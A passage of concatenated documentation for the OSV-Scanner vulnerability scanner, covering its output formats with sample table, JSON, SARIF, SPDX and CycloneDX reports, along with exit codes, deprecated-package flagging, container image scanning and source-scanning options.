osv-reporter --new osv-scanner.json --output-files=[format]:[output-path],[format2]:[output-path2] ``` ## How to install We don't provide prebuilt binaries for osv-reporter as it is very experimental and can change at any point. Currently you can install it from source via `go install`: ```bash $ go install github.com/google/osv-scanner/v2/cmd/osv-reporter@latest # Or @main for the latest commit ``` ================================================ FILE: docs/output.md ================================================ --- layout: page permalink: /output/ nav_order: 6 --- # Output {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
## Explanation of output data For every vulnerability found, OSV-Scanner will display the following information: - OSV URL: Link to the osv.dev entry for the vulnerability - CVSS: CVSS v2 or v3, calculated from the [severity[].score](https://ossf.github.io/osv-schema/#severity-field) field. - Ecosystem: Ecosystem associated with the package - Package: Package name - Version: Package version - Fixed Version: The version where the vulnerability is fixed, if available. If no fix is available, this will be shown as `--`. - Source: Path to the sbom or lockfile where the package originated And if you are performing layer scanning, osv-scanner additionally returns: - Layer where a package was first introduced - Layer history and commands - Base images the image is based on - OS/Distro the container is running on ## Output formats You can control the format used by the scanner to output results with the `--format` flag. ### Table (Default) The default format, which outputs the results as a human-readable table. ```bash osv-scanner scan --format table your/project/dir ```
Sample table output ```bash Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. ╭─────────────────────────────────────┬──────┬───────────┬──────────────────────────┬───────────────┬─────────┬────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ FIXED VERSION │ VERSION │ SOURCE │ ├─────────────────────────────────────┼──────┼───────────┼──────────────────────────┼───────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-c3h9-896r-86jm │ 8.6 │ Go │ github.com/gogo/protobuf │ 1.3.2 │ 1.3.1 │ path/to/go.mod │ │ https://osv.dev/GHSA-m5pq-gvj9-9vr8 │ 7.5 │ crates.io │ regex │ -- │ 1.3.1 │ path/to/Cargo.lock │ ╰─────────────────────────────────────┴──────┴───────────┴──────────────────────────┴───────────────┴─────────┴────────────────────╯ ``` If the 'Fixed Version' column is empty or shows `--`, it means there is currently no fix for this vulnerability.
--- ### Markdown Table ```bash osv-scanner scan --format markdown your/project/dir ```
Sample markdown output **Raw output:** ``` Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. | OSV URL | CVSS | Ecosystem | Package | Fixed Version | Version | Source | | ---------------------------------- | ---- | --------- | ------------------------ | ------------- | ------- | ------------------------------------------------------ | | https://osv.dev/GHSA-c3h9-896r-86jm| 8.6 | Go | github.com/gogo/protobuf | 1.3.2 | 1.3.1 | ../scorecard-check-osv-e2e/go.mod | | https://osv.dev/GHSA-m5pq-gvj9-9vr8| 7.5 | crates.io | regex | -- | 1.5.1 | ../scorecard-check-osv-e2e/sub-rust-project/Cargo.lock | ``` **Rendered:** | OSV URL | CVSS | Ecosystem | Package | Fixed Version | Version | Source | | ----------------------------------- | ---- | --------- | ------------------------ | ------------- | ------- | ------------------------------------------------------ | | https://osv.dev/GHSA-c3h9-896r-86jm | 8.6 | Go | github.com/gogo/protobuf | 1.3.2 | 1.3.1 | ../scorecard-check-osv-e2e/go.mod | | https://osv.dev/GHSA-m5pq-gvj9-9vr8 | 7.5 | crates.io | regex | -- | 1.5.1 | ../scorecard-check-osv-e2e/sub-rust-project/Cargo.lock |
--- ### Vertical ```bash osv-scanner scan --format vertical your/project/dir ```
Sample vertical output ```bash Total 2 packages affected by 2 known vulnerabilities (1 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. Go path/to/go.mod: found 1 package with issues github.com/gogo/protobuf@1.3.1 has the following known vulnerabilities: GHSA-c3h9-896r-86jm: Improper Input Validation in GoGo Protobuf Severity: '8.6'; Minimal Fix Version: '1.3.2'; 1 known vulnerability found in path/to/go.mod crates.io path/to/Cargo.lock: found 1 package with issues regex@1.5.1 has the following known vulnerabilities: GHSA-m5pq-gvj9-9vr8: Rust's regex crate vulnerable to regular expression denial of service Severity: '7.5'; Minimal Fix Version: '1.5.5'; 1 known vulnerability found in path/to/Cargo.lock ```
--- ### HTML ```bash osv-scanner scan --format html your/project/dir # OR osv-scanner scan --serve your/project/dir # Hosts HTML output at localhost port 8000 # Use the --port flag along with --serve to specify a custom port to host the output ``` The HTML output features a lot more interactivity and information compared to terminal only outputs, including: - Severity breakdown - Package and ID filtering - Vulnerability importance filtering - Full vulnerability advisory entries And additionally for container image scanning: - Layer filtering - Image layer information - Base image identification
Sample HTML output ![HTML Output Screenshot](./images/html-container-output.png)
### JSON JSON output allows you to get all the information osv-scanner found in a machine-readable format. ```bash osv-scanner scan --format json your/project/dir ``` Outputs the results as a JSON object to stdout, with all other output being directed to stderr - this makes it safe to redirect the output to a file with ```bash osv-scanner scan --format json -L path/to/lockfile > /path/to/file.json ```
Sample JSON output ```json { "results": [ { "source": { "path": "/absolute/path/to/go.mod", // One of: lockfile, sbom, git, docker "type": "lockfile" }, "packages": [ { "package": { "name": "github.com/gogo/protobuf", "version": "1.3.1", "ecosystem": "Go" }, "vulnerabilities": [ { "id": "GHSA-c3h9-896r-86jm", "aliases": ["CVE-2021-3121"] // ... Full OSV }, { "id": "GO-2021-0053", "aliases": ["CVE-2021-3121", "GHSA-c3h9-896r-86jm"] // ... Full OSV } ], // Grouping based on aliases, if two vulnerability share the same alias, or alias each other, // they are considered the same vulnerability, and is grouped here under the id field. "groups": [ { "ids": ["GHSA-c3h9-896r-86jm", "GO-2021-0053"], // Call stack analysis is done using the `--call-analysis=` flag // and result is matched against data provided by the advisory to check if // affected code is actually being executed. "experimentalAnalysis": { "GO-2021-0053": { "called": false } } } ] } ] }, { "source": { "path": "/absolute/path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "regex", "version": "1.5.1", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-m5pq-gvj9-9vr8", "aliases": ["CVE-2022-24713"] // ... Full OSV }, { "id": "RUSTSEC-2022-0013", "aliases": ["CVE-2022-24713"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-m5pq-gvj9-9vr8", "RUSTSEC-2022-0013"] } ] } ] } ] } ```
--- ### SARIF ```bash osv-scanner scan --format sarif your/project/dir ``` Outputs the result in the [SARIF](https://sarifweb.azurewebsites.net/) v2.1.0 format. Each vulnerability (grouped by aliases) is a separate rule, and each package containing a vulnerable dependency is a rule violation. The help text within the SARIF report contains detailed information about the vulnerability and remediation instructions for how to resolve it.
Sample SARIF output ```json { "version": "2.1.0", "$schema": "https://json.schemastore.org/sarif-2.1.0.json", "runs": [ { "tool": { "driver": { "informationUri": "https://github.com/google/osv-scanner", "name": "osv-scanner", "rules": [ { "id": "CVE-2022-24713", "shortDescription": { "text": "CVE-2022-24713: " }, "fullDescription": { "text": "...", "markdown": "..." }, // Deprecated IDs field contains all alias IDs "deprecatedIds": [ "CVE-2022-24713", "RUSTSEC-2022-0013", "GHSA-m5pq-gvj9-9vr8" ], "help": { "text": "...", "markdown": "..." } } ], "version": "1.4.1" } }, "artifacts": [ { "location": { "uri": "file:///path/to/sub-rust-project/Cargo.lock" }, "length": -1 } ], "results": [ { "ruleId": "CVE-2022-24713", "ruleIndex": 0, "level": "warning", "message": { "text": "Package 'regex@1.5.1' is vulnerable to 'CVE-2022-24713' (also known as 'RUSTSEC-2022-0013', 'GHSA-m5pq-gvj9-9vr8')." }, "locations": [ { "physicalLocation": { "artifactLocation": { "uri": "file:///path/to/sub-rust-project/Cargo.lock" } } } ] } ] } ] } ```
Sample SARIF Help Text > **Your dependency is vulnerable to [CVE-2022-24713](https://osv.dev/list?q=CVE-2022-24713)** > (Also published as: [RUSTSEC-2022-0013](https://osv.dev/vulnerability/RUSTSEC-2022-0013), [GHSA-m5pq-gvj9-9vr8](https://osv.dev/vulnerability/GHSA-m5pq-gvj9-9vr8), ). > > {:.no_toc} > > ## [RUSTSEC-2022-0013](https://osv.dev/vulnerability/RUSTSEC-2022-0013) > >
> Details > > > Full advisory details... > >
> > {:.no_toc} > > ## [GHSA-m5pq-gvj9-9vr8](https://osv.dev/vulnerability/GHSA-m5pq-gvj9-9vr8) > >
> Details > > > Full advisory details... > >
> > --- > > {:.no_toc} > > ### Affected Packages > > | Source | Package Name | Package Version | > | ----------------------------------------- | ------------ | --------------- | > | lockfile:/path/to/rust-project/Cargo.lock | regex | 1.5.1 | > > {:.no_toc} > > ## Remediation > > To fix these vulnerabilities, update the vulnerabilities past the listed fixed versions below. > > {:.no_toc} > > ### Fixed Versions > > | Vulnerability ID | Package Name | Fixed Version | > | ------------------- | ------------ | ------------- | > | GHSA-m5pq-gvj9-9vr8 | regex | 1.5.5 | > | RUSTSEC-2022-0013 | regex | 1.5.5 | > > If you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an > `osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency. > > See the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/ > > Add or append these values to the following config files to ignore this vulnerability: > > `/path/to/rust-project/osv-scanner.toml` > > ``` > [[IgnoredVulns]] > id = "CVE-2022-24713" > reason = "Your reason for ignoring this vulnerability" > ```
--- ### SPDX ```bash osv-scanner scan --format spdx-2-3 --all-packages your/project/dir ``` Outputs the result in the [SPDX](https://spdx.dev/) v2.3 format. This matches OSV-Scalibr's SPDX output format. {: .note } SPDX only supports listing the packages found, and does not include vulnerability information. However, `osv-scanner` will still exit with a non-zero exit code (`1`) if any vulnerabilities are found.
Sample SPDX output ```json { "spdxVersion": "SPDX-2.3", "dataLicense": "CC0-1.0", "SPDXID": "SPDXRef-DOCUMENT", "name": "SCALIBR-generated SPDX", "documentNamespace": "https://spdx.google/uuid-placeholder-0", "creationInfo": { "creators": ["Tool: SCALIBR"], "created": "2025-08-11T02:58:42Z" }, "packages": [ { "name": "main", "SPDXID": "SPDXRef-Package-main-uuid-placeholder-1", "versionInfo": "0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false }, { "name": "has-flag", "SPDXID": "SPDXRef-Package-has-flag-uuid-placeholder-2", "versionInfo": "4.0.0", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /path/to/bun.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/has-flag@4.0.0" } ] }, { "name": "wrappy", "SPDXID": "SPDXRef-Package-wrappy-uuid-placeholder-3", "versionInfo": "1.0.2", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the javascript/bunlock extractor from /path/to/bun.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:npm/wrappy@1.0.2" } ] }, { "name": "league/flysystem", "SPDXID": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "versionInfo": "1.0.8", "supplier": "NOASSERTION", "downloadLocation": "NOASSERTION", "filesAnalyzed": false, "sourceInfo": "Identified by the php/composerlock extractor from /path/to/composer.lock", "externalRefs": [ { "referenceCategory": "PACKAGE-MANAGER", "referenceType": "purl", "referenceLocator": "pkg:composer/league%2Fflysystem@1.0.8" } ] } ], "relationships": [ { "spdxElementId": "SPDXRef-DOCUMENT", "relatedSpdxElement": "SPDXRef-Package-main-uuid-placeholder-1", "relationshipType": "DESCRIBES" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-has-flag-uuid-placeholder-2", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-wrappy-uuid-placeholder-3", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-main-uuid-placeholder-1", "relatedSpdxElement": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relationshipType": "CONTAINS" }, { "spdxElementId": "SPDXRef-Package-league-flysystem-uuid-placeholder-4", "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS" } ] } ```
--- ### CycloneDX ```bash osv-scanner scan --format cyclonedx-1-5 --all-packages your/project/dir ``` Outputs the result in the [CycloneDX](https://cyclonedx.org/) format. You can also specify cyclonedx 1.4 using `--format cyclonedx-1.4`.
Sample CycloneDX output ```json { "$schema": "http://cyclonedx.org/schema/bom-1.5.schema.json", "bomFormat": "CycloneDX", "specVersion": "1.5", "version": 1, "components": [ { "bom-ref": "pkg:composer/league/flysystem@1.0.8", "type": "library", "name": "league/flysystem", "version": "1.0.8", "licenses": [], "purl": "pkg:composer/league/flysystem@1.0.8" }, { "bom-ref": "pkg:npm/has-flag@4.0.0", "type": "library", "name": "has-flag", "version": "4.0.0", "licenses": [], "purl": "pkg:npm/has-flag@4.0.0" }, { "bom-ref": "pkg:npm/wrappy@1.0.2", "type": "library", "name": "wrappy", "version": "1.0.2", "licenses": [], "purl": "pkg:npm/wrappy@1.0.2" } ], "vulnerabilities": [ { "id": "GHSA-9f46-5r25-5wfm", "references": [ { "id": "CVE-2021-32708", "source": {} } ], "ratings": [ { "method": "CVSSv3", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "description": "Time-of-check Time-of-use (TOCTOU) Race Condition in league/flysystem", "detail": "### Impact\n\nThe whitespace normalisation using in 1.x and 2.x removes any unicode whitespace. Under certain specific conditions this could potentially allow a malicious user to execute code remotely.\n\nThe conditions: \n\n- A user is allowed to supply the path or filename of an uploaded file.\n- The supplied path or filename is not checked against unicode chars.\n- The supplied pathname checked against an extension deny-list, not an allow-list.\n- The supplied path or filename contains a unicode whitespace char in the extension.\n- The uploaded file is stored in a directory that allows PHP code to be executed.\n\nGiven these conditions are met a user can upload and execute arbitrary code on the system under attack.\n\n### Patches\n\nThe unicode whitespace removal has been replaced with a rejection (exception).\n\nThe library has been patched in:\n- 1.x: https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32\n- 2.x: https://github.com/thephpleague/flysystem/commit/a3c694de9f7e844b76f9d1b61296ebf6e8d89d74\n\n### Workarounds\n\nFor 1.x users, upgrade to 1.1.4. For 2.x users, upgrade to 2.1.1.\n", "advisories": [ { "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32708" } ], "published": "2021-06-29T03:13:28Z", "updated": "2024-02-16T08:21:35Z", "credits": { "organizations": [] }, "affects": [ { "ref": "pkg:composer/league/flysystem" } ] } ] } ```
--- ## Call analysis With `--call-analysis=` flag enabled, call information will be included in the output. See [Scanning with call analysis](./scan-source.md#scanning-with-call-analysis) for more details on how to enable call analysis. ### Table In the table output format, call analysis info is used to split output between vulnerabilities that affects code called by your project, and vulnerabilities that only affect code paths not called by your code. ```bash osv-scanner scan --format table --call-analysis=rust your/project/dir ```
Sample table output ```bash ╭─────────────────────────────────────┬──────┬───────────┬─────────────────┬─────────┬────────────────────╮ │ OSV URL │ CVSS │ ECOSYSTEM │ PACKAGE │ VERSION │ SOURCE │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-qc84-gqf4-9926 │ 8.1 │ crates.io │ crossbeam-utils │ 0.6.6 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2022-0041 │ │ │ │ │ │ │ https://osv.dev/GHSA-43w2-9j62-hq99 │ 9.8 │ crates.io │ smallvec │ 1.6.0 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2021-0003 │ │ │ │ │ │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ Uncalled vulnerabilities │ │ │ │ │ │ ├─────────────────────────────────────┼──────┼───────────┼─────────────────┼─────────┼────────────────────┤ │ https://osv.dev/GHSA-xcf7-rvmh-g6q4 │ │ crates.io │ openssl │ 0.10.52 │ path/to/Cargo.lock │ │ https://osv.dev/RUSTSEC-2023-0044 │ │ │ │ │ │ ╰─────────────────────────────────────┴──────┴───────────┴─────────────────┴─────────┴────────────────────╯ ```
### JSON The JSON output will include analysis results for each vulnerability group. ```bash osv-scanner scan --format json --call-analysis=rust -L path/to/lockfile > /path/to/file.json ```
Sample JSON output ```json { "results": [ { "source": { "path": "path/to/Cargo.lock", "type": "lockfile" }, "packages": [ { "package": { "name": "crossbeam-utils", "version": "0.6.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-qc84-gqf4-9926", "aliases": ["CVE-2022-23639"] // ... Full OSV }, { "id": "RUSTSEC-2022-0041", "aliases": ["GHSA-qc84-gqf4-9926", "CVE-2022-23639"] // ... Full OSV } ], "groups": [ { // This vuln has no function info, so no call analysis done "ids": ["GHSA-qc84-gqf4-9926", "RUSTSEC-2022-0041"] } ] }, { "package": { "name": "memoffset", "version": "0.5.6", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-wfg4-322g-9vqv" // ... Full OSV }, { "id": "RUSTSEC-2023-0045", "aliases": ["GHSA-wfg4-322g-9vqv"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-wfg4-322g-9vqv", "RUSTSEC-2023-0045"], // RUSTSEC-2023-0045 does have function info, call analysis is performed // the vulnerable function is not called "experimentalAnalysis": { "RUSTSEC-2023-0045": { "called": false } } } ] }, { "package": { "name": "smallvec", "version": "1.6.0", "ecosystem": "crates.io" }, "vulnerabilities": [ { "id": "GHSA-43w2-9j62-hq99", "aliases": ["CVE-2021-25900"] // ... Full OSV }, { "id": "RUSTSEC-2021-0003", "aliases": ["CVE-2021-25900", "GHSA-43w2-9j62-hq99"] // ... Full OSV } ], "groups": [ { "ids": ["GHSA-43w2-9j62-hq99", "RUSTSEC-2021-0003"], // RUSTSEC-2021-0003 does have function info, call analysis is performed // the vulnerable function does get called. "experimentalAnalysis": { "RUSTSEC-2021-0003": { "called": true } } } ] } ] } ] } ```
## Return Codes | Exit Code | Reason | | :-------: | -------------------------------------------------------------------------------------------- | | `0` | Packages were found when scanning, but does not match any known vulnerabilities or findings. | | `1` | Packages were found when scanning, and there are vulnerabilities or findings. | | `1-126` | Reserved for vulnerability result related errors. | | `127` | General Error. | | `128` | No packages found (likely caused by the scanning format not picking up any files to scan). | | `129-255` | Reserved for non result related errors. | ================================================ FILE: docs/package-deprecation.md ================================================ --- layout: page permalink: /experimental/flag-deprecated-packages/ parent: Experimental Features nav_order: 4 --- # Flag Deprecated Packages Experimental {: .label } OSV-Scanner can identify and report unsupported or removed packages in dependencies. This feature leverages the [deps.dev API](https://docs.deps.dev/api/). ## Deprecation Status The `deprecated` field is a boolean value indicating if a package is flagged as unsupported. This includes states such as: - **Deprecated**: Marked as deprecated by the author. - **Yanked**: Removed from the registry. ## Usage To enable package deprecation reporting, use the `--experimental-flag-deprecated-packages` flag. The feature is not available in the `spdx` format. ### Project Source Scanning ```bash osv-scanner scan source --experimental-flag-deprecated-packages -r /path/to/project ``` For more details on source scanning, see [Project Source Scanning](./scan-source.md). ### Container Images Scanning ```bash # Scan a local or remote image by name osv-scanner scan image --experimental-flag-deprecated-packages my-image:tag # Scan an exported image archive osv-scanner scan image --experimental-flag-deprecated-packages --archive ./path/to/my-image.tar ``` For more details on image scanning, see [Container Image Scanning](./scan-image.md). ## Output When enabled, the output reports deprecated packages as follows: - **Table, Markdown, HTML**: A dedicated section listing deprecated packages. - **JSON**: A `deprecated` field in the `package` object. - **SARIF**: A "Deprecated" column in the "Affected Packages" table. - **CycloneDX**: A `deprecated` property in `component`. If no deprecated packages are detected, the corresponding section or field is omitted.
Example JSON Output ```json { "results": [ { "source": { "path": "/path/to/lockfile", "type": "lockfile" }, "packages": [ { "package": { "name": "deprecated-package", "version": "1.0.0", "ecosystem": "npm", "deprecated": true } }, { "package": { "name": "not-deprecated-package", "version": "2.0.0", "ecosystem": "npm" } } ] } ] } ```
================================================ FILE: docs/scan-image.md ================================================ --- layout: page parent: Usage permalink: /usage/scan-image nav_order: 1 --- # Container Image Scanning {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
OSV-Scanner analyzes container images by extracting package information and matching it against known vulnerabilities in the OSV.dev database. This helps identify potential security risks in your containerized applications. ### Prerequisites - **Docker (Optional)**: If you want to scan images directly by name (e.g., my-image:latest) without exporting them first, the docker command-line tool must be installed and available in your system's PATH. If you choose to scan exported image archives, Docker is not required. All image scanning is done with the `scan image` subcommand: ```bash osv-scanner scan image : ``` ## Scanning Methods You can scan container images using two primary methods: 1. **Direct Image Scan:** Specify the image name and tag (e.g., `my-image:latest`). OSV-Scanner will attempt to locate the image locally. If not found locally, it will attempt to pull the image from the appropriate registry using the `docker` command. ```bash osv-scanner scan image image-name:tag ``` - **How it works:** OSV-Scanner uses `docker save` to export the image to a temporary archive, which is then analyzed. No container code is executed during the scan. 2. **Scan from Exported Image Archive:** If you have already exported your container image as a Docker archive (`.tar` file), you can scan it directly using the `--archive` flag. This method does not require Docker to be installed. ```bash osv-scanner scan image --archive ./path/to/my-image.tar ``` - **How to create an image archive:** You can create an image archive using the following commands: ```bash # Using Docker docker save my-image:latest > my-image.tar # Using Podman podman save --format=docker-archive my-image:latest > my-image.tar # Other image tools: Use the docker archive format to export the tar ``` ### Usage Notes - **No other scan targets:** When using `scan image`, you cannot specify other scan targets (e.g., directories or lockfiles). - **Configuration Flags:** All the global configuration flags available for the `scan` command (as described in the [Usage documentation](./usage.md)) can be used with the `scan image` subcommand. This includes flags for output format, verbosity, config files, and experimental features. ## Scanning targets OSV-Scanner scans for OS packages and build artifacts, including dependency information, on the given image, and attributes them to specific layers in the container. See [Supported Artifacts](./supported_languages_and_lockfiles.md#supported-artifacts) for details on what targets are scanned. ## Output By default, OSV-Scanner provides a summarized output of the scan results, grouping vulnerabilities by package. This is designed to handle the large number of vulnerabilities often found in container images.
Sample table output ```bash Container Scanning Result (Debian GNU/Linux 12 (bookworm)): Total 20 packages affected by 105 vulnerabilities (7 Critical, 14 High, 19 Medium, 1 Low, 64 Unknown) from 2 ecosystems. 54 vulnerabilities have fixes available. Go ╭─────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:artifact:artifact/tester-built-with-1-21-0 │ ├─────────┬───────────────────┬───────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE IMAGE │ ├─────────┼───────────────────┼───────────────┼────────────┼──────────────────┼───────────────┤ │ stdlib │ 1.21.0 │ Fix Available │ 20 │ # 8 Layer │ -- │ ╰─────────┴───────────────────┴───────────────┴────────────┴──────────────────┴───────────────╯ ╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:artifact:src/tester │ ├─────────────────────────────┬───────────────────┬───────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE IMAGE │ ├─────────────────────────────┼───────────────────┼───────────────┼────────────┼──────────────────┼───────────────┤ │ github.com/gogo/protobuf │ 1.3.1 │ Fix Available │ 1 │ # 9 Layer │ -- │ │ github.com/ipfs/go-bitfield │ 1.0.0 │ Fix Available │ 1 │ # 9 Layer │ -- │ │ stdlib │ 1.19.8 │ Fix Available │ 25 │ # 9 Layer │ -- │ ╰─────────────────────────────┴───────────────────┴───────────────┴────────────┴──────────────────┴───────────────╯ Debian:12 ╭───────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Source:os:var/lib/dpkg/status │ ├─────────────┬───────────────────┬─────────────────────────┬────────────┬──────────────────┬───────────────┤ │ PACKAGE │ INSTALLED VERSION │ FIX AVAILABLE │ VULN COUNT │ INTRODUCED LAYER │ IN BASE IMAGE │ ├─────────────┼───────────────────┼─────────────────────────┼────────────┼──────────────────┼───────────────┤ │ aom │ 3.6.0-1+deb12u1 │ No fix available │ 2 │ # 1 Layer │ -- │ ... │ zlib │ 1:1.2.13.dfsg-1 │ No fix available │ 1 │ # 0 Layer │ debian │ ╰─────────────┴───────────────────┴─────────────────────────┴────────────┴──────────────────┴───────────────╯ Filtered Vulnerabilities: ╭─────────────┬───────────┬───────────────────────┬─────────────────────┬────────────────╮ │ PACKAGE │ ECOSYSTEM │ INSTALLED VERSION │ FILTERED VULN COUNT │ FILTER REASONS │ ├─────────────┼───────────┼───────────────────────┼─────────────────────┼────────────────┤ │ apt │ Debian:12 │ 2.6.1 │ 1 │ Unimportant │ │ binutils │ Debian:12 │ 2.40-2 │ 8 │ Unimportant │ ... │ util-linux │ Debian:12 │ 2.38.1-5+deb12u2 │ 1 │ Unimportant │ ╰─────────────┴───────────┴───────────────────────┴─────────────────────┴────────────────╯ ```
### Detailed Output: For a more detailed view of vulnerabilities, including individual **vulnerability details**, **base image identification**, and **layer specific filters**, use the HTML output format. You can enable it using: - `--format=html`: This will output the results to an HTML file. - `--serve`: This will generate an HTML report and host it locally on `localhost:8000`. See the [Output documentation](./output.md) for more information on output formats. **Sample HTML Output**: ![Screenshot of HTML output for container image scanning](./images/html-container-output.png) ================================================ FILE: docs/scan-source.md ================================================ --- layout: page parent: Usage permalink: /usage/scan-source nav_order: 2 --- # Project Source Scanning OSV-Scanner can be used to scan your project source and lockfiles to find vulnerabilities in your dependencies. ```bash osv-scanner scan source [paths...] ``` As this is the most common use case of osv-scanner, `scan source` is the default subcommand of osv-scanner, so the above is equivalent to: ```bash osv-scanner [paths...] ``` ## General use case: scanning a directory ```bash osv-scanner scan source -r /path/to/your/dir ``` The preceding command will find lockfiles, SBOMs, and git directories in your target directory and use them to determine the dependencies to check against the OSV database for any known vulnerabilities. The recursive flag `-r` or `--recursive` will tell the scanner to search all subdirectories in addition to the specified directory. It can find additional lockfiles, dependencies, and vulnerabilities. If your project has deeply nested subdirectories, a recursive search may take a long time. ## Ignored files By default, OSV-Scanner will not scan files that are ignored by `.gitignore` files. All recursively scanned files are matched to a git repository (if it exists) and any matching `.gitignore` files within that repository are taken into account. There is a [known issue](https://github.com/google/osv-scanner/issues/209) that the parser does not correctly respect repository boundaries. The `--no-ignore` flag can be used to force the scanner to scan ignored files. ## Excluding Paths Experimental {: .label } You can exclude specific paths from scanning using the `--experimental-exclude` flag. This is useful for excluding test directories, documentation, or vendor directories from vulnerability scans. **Note:** This flag currently only excludes directories, not individual files. This is an experimental feature and the syntax may change in future versions. ### Syntax The flag supports three pattern types, matching the `--lockfile` flag syntax: - **Exact directory name** (no prefix or `:` prefix): Matches directories with the exact name - **Glob pattern** (`g:` prefix): Matches using glob patterns - **Regex pattern** (`r:` prefix): Matches using regular expressions ### Examples ```bash # Exclude directories named "test" or "docs" (exact match) osv-scanner scan source -r --experimental-exclude=test --experimental-exclude=docs /path/to/your/dir # Exclude using glob patterns osv-scanner scan source -r --experimental-exclude="g:**/test/**" --experimental-exclude="g:**/docs/**" /path/to/your/dir # Exclude using regex patterns osv-scanner scan source -r --experimental-exclude="r:.*_test$" /path/to/your/dir # Mix different pattern types osv-scanner scan source -r --experimental-exclude=vendor --experimental-exclude="g:**/test/**" --experimental-exclude="r:\\.cache" /path/to/your/dir # Escape directory names containing colons using : prefix osv-scanner scan source -r --experimental-exclude=":my:project" /path/to/your/dir ``` ### Common use cases - Excluding test directories: `--experimental-exclude=test` or `--experimental-exclude="g:**/test/**"` - Excluding documentation: `--experimental-exclude=docs` - Excluding vendor directories: `--experimental-exclude=vendor` Alternatively, you can use the `osv-scanner.toml` configuration file with `[[PackageOverrides]]` to ignore specific packages or directories. See [Configuration](./configuration.md) for more details. ## SBOM scanning SBOMs will be automatically identified so long as their name follows the specification for the particular format: - [SPDX Filenames]: - `*.spdx.json` - `*.spdx` - `*.spdx.yml` - `*.spdx.rdf` - `*.spdx.rdf.xml` - [CycloneDX Filenames]: - `bom.json` - `*.cdx.json` - `bom.xml` - `*.cdx.xml` ```bash osv-scanner scan source -L /path/to/your/sbom.spdx.json ``` [SPDX] and [CycloneDX] SBOMs using [Package URLs] are supported. [SPDX]: https://spdx.dev/ [SPDX Filenames]: https://spdx.github.io/spdx-spec/v2.3/conformance/ [CycloneDX Filenames]: https://cyclonedx.org/specification/overview/#recognized-file-patterns [CycloneDX]: https://cyclonedx.org/ [Package URLs]: https://github.com/package-url/purl-spec ## Specify Lockfile(s) If you want to check for known vulnerabilities in specific lockfiles, you can use the following command: ```bash osv-scanner scan source --lockfile=/path/to/your/package-lock.json --lockfile=/path/to/another/Cargo.lock ``` It is possible to specify more than one lockfile at a time; you can also specify how to parse an arbitrary file: ```bash osv-scanner scan source --lockfile 'requirements.txt:/path/to/your/extra-requirements.txt' ``` The list of supported lockfile formats can be found [here](./supported_languages_and_lockfiles.md). If the file you are scanning is located in a directory that has a colon in its name, you can prefix the path to just a colon to explicitly signal to the scanner that it should infer the parser based on the filename: ```bash osv-scanner scan source --lockfile ':/path/to/my:projects/package-lock.json' ``` ## Git Repository Scanning OSV-Scanner will automatically scan git submodules and vendored directories for C/C++ code and try to attribute them to specific dependencies and versions. See [C/C++ Scanning](./supported_languages_and_lockfiles.md#cc-scanning) for more details. By default, root git directories (i.e. git repositories that are not a submodule of a bigger git repo) are skipped. You can include those repositories by setting the `--include-git-root` flag. ## Scanning with call analysis Call stack analysis can be performed on some languages to check if the vulnerable code is actually being executed by your project. If the code 